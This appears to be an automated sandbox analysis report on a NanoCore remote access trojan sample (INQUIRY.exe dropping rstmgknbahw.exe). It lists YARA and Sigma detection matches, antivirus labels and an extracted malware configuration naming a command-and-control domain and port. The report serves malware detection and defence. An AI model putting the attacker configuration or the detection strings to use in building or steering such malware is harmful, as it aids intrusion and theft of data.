2.0.INQUIRY.exe.400000.8.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
4.0.rstmgknbahw.exe.415058.12.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.415058.12.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
4.0.rstmgknbahw.exe.415058.12.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.415058.12.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.rstmgknbahw.exe.2400000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d9e5:$x1: NanoCore.ClientPluginHost 0x1da22:$x2: IClientNetworkHost 0x21555:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.rstmgknbahw.exe.2400000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d75d:$x1: NanoCore Client.exe 0x1d9e5:$x2: NanoCore.ClientPluginHost 0x1f01e:$s1: PluginCommand 0x1f012:$s2: FileCommand 0x1fec3:$s3: PipeExists 0x25c7a:$s4: PipeCreated 0x1da0f:$s5: IClientLoggingHost
5.2.rstmgknbahw.exe.2400000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.rstmgknbahw.exe.2400000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1d74d:$a: NanoCore 0x1d75d:$a: NanoCore 0x1d991:$a: NanoCore 0x1d9a5:$a: NanoCore 0x1d9e5:$a: NanoCore 0x1d7ac:$b: ClientPlugin 0x1d9ae:$b: ClientPlugin 0x1d9ee:$b: ClientPlugin 0x1d8d3:$c: ProjectData 0x1e2da:$d: DESCrypto 0x25ca6:$e: KeepAlive 0x23c94:$g: LogClientMessage 0x1fe8f:$i: get_Connected 0x1e610:$j: #=q 0x1e640:$j: #=q 0x1e65c:$j: #=q 0x1e68c:$j: #=q 0x1e6a8:$j: #=q 0x1e6c4:$j: #=q 0x1e6f4:$j: #=q 0x1e710:$j: #=q
6.0.rstmgknbahw.exe.400000.11.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.400000.11.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.400000.11.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.400000.11.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
6.2.rstmgknbahw.exe.638d50.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.rstmgknbahw.exe.638d50.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.638d50.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.rstmgknbahw.exe.638d50.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
4.0.rstmgknbahw.exe.400000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.400000.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
4.0.rstmgknbahw.exe.400000.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.400000.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
Click to see the 416 entries

Sigma Overview

AV Detection

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\INQUIRY.exe, ProcessId: 7084, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\INQUIRY.exe, ProcessId: 7084, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Stealing of Sensitive Information

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\INQUIRY.exe, ProcessId: 7084, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Remote Access Functionality

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\INQUIRY.exe, ProcessId: 7084, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "b46b5964-4830-4c6b-9df5-a21557a1", "Group": "Default", "Domain1": "onyeoma.ddns.net", "Domain2": "127.0.0.1", "Port": 4141, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara detected Nanocore RAT

Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.3820e14.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.382543d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.3950e14.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.3950e14.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.39a98c0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.395543d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.39adee9.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.39a98c0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.3820e14.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTR

Machine Learning detection for sample

Source: INQUIRY.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe

Joe Sandbox ML: detected

Source: 4.0.rstmgknbahw.exe.400000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 1.2.INQUIRY.exe.30e0000.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.0.INQUIRY.exe.400000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.INQUIRY.exe.400000.7.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 6.0.rstmgknbahw.exe.400000.7.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.INQUIRY.exe.400000.5.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 6.0.rstmgknbahw.exe.400000.9.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.0.rstmgknbahw.exe.400000.9.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.INQUIRY.exe.400000.9.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.INQUIRY.exe.400000.11.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 6.0.rstmgknbahw.exe.400000.6.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 6.2.rstmgknbahw.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 6.1.rstmgknbahw.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 6.0.rstmgknbahw.exe.400000.8.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.0.rstmgknbahw.exe.400000.11.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.0.rstmgknbahw.exe.400000.7.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.0.rstmgknbahw.exe.400000.5.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.1.rstmgknbahw.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.2.INQUIRY.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.2.INQUIRY.exe.39a98c0.6.unpack	Avira: Label: TR/NanoCore.fadte
Source: 6.0.rstmgknbahw.exe.400000.5.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.2.rstmgknbahw.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 6.0.rstmgknbahw.exe.400000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.2.INQUIRY.exe.2520000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.0.rstmgknbahw.exe.400000.8.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.INQUIRY.exe.400000.6.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.INQUIRY.exe.400000.8.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 6.0.rstmgknbahw.exe.400000.11.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.0.rstmgknbahw.exe.400000.6.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\INQUIRY.exe	Unpacked PE file: 2.2.INQUIRY.exe.2520000.4.unpack
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Unpacked PE file: 6.2.rstmgknbahw.exe.4980000.9.unpack

Source: INQUIRY.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\INQUIRY.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source:	Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdb] source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbX source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
